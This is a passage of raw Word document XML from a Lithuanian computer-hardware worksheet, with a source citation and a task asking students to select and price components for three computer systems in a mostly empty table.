          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Computer Cases and The Different Types of Form Factors</w:t>
      </w:r>
      <w:r w:rsidR="0041072E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0041072E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>Stone Refurb.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>internetą:</w:t>
      </w:r>
      <w:r w:rsidR="0041072E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId199" w:history="1">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.stonerefurb.co.uk/form-factors-explained</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78567EE5" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294F03C4" w14:textId="1B3BB4A1" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="003D0977" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PARINK</w:t>
      </w:r>
      <w:r w:rsidR="00ED5178" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>TI</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> TINKAMUS KOMPIUTERIO KOMPONENTUS TR</w:t>
      </w:r>
      <w:r w:rsidR="2EB51C24" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>EJOMS</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> KOMPIUTERIO SISTEMOMS</w:t>
      </w:r>
      <w:r w:rsidR="00922E39" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A01A5CA" w14:textId="702FA2CE" w:rsidR="00ED5178" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">arinkite </w:t>
      </w:r>
      <w:r w:rsidR="00ED5178" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">tinkamus kompiuterio </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">komponentus </w:t>
      </w:r>
      <w:r w:rsidR="005A03EA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>trims</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kompiuterinėms sistemoms (verslui (biurui) arba namų vartotojams, žaidimams</w:t>
      </w:r>
      <w:r w:rsidR="00922E39" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir pan.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pagal pateiktą apačioje pavyzdį</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sudarykite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>lentelę ir,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>remdamiesi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>surinkta informacija apie kompiuterinių sistemų komponentų parametrus bei kainas</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įrašykite joje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B7190C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>išvadas bei apibendrinimus. Informaciją galite pateikti ir</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ekrano vaizdu</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2531"/>
        <w:gridCol w:w="4979"/>
        <w:gridCol w:w="944"/>
        <w:gridCol w:w="1457"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6C12513D" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0A83A913" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Prekės pavadinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="77FA059B" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Prekės modelis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4DB604FE" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vnt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5AEA5D83" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Kaina 1 vnt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="24E5181F" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="15C38B85" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Procesorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="09CC389F" w14:textId="4BF5B6D2" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7AA4F44A" w14:textId="32C1B2D0" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="253CB47E" w14:textId="4F4F5D78" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5A7562B5" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="03DB28A5" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Pagrindinė plokštė </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="09B2EB15" w14:textId="6F6A24AF" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2FF12D64" w14:textId="624E42EB" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="526727F9" w14:textId="2C73674A" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2BC884C5" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="64589F21" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Operatyvinė atmintis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="36DDABFA" w14:textId="02E3E857" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="711B5A61" w14:textId="7B2CDB3F" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="41671CCC" w14:textId="560E3C51" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="498E2CEC" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="469A380E" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vidinis diskas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="25655DA9" w14:textId="72B5CEA1" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3CC6D770" w14:textId="65E73A55" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3343C29F" w14:textId="7C550D2C" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="741444EE" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6E5E276F" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Maitinimo šaltinis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2D1BB507" w14:textId="3407CDCB" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1AFC9002" w14:textId="747B2A04" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="662D549F" w14:textId="43C4EB14" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7036666F" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="48A55140" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Korpusas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="092AE895" w14:textId="63CEA426" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
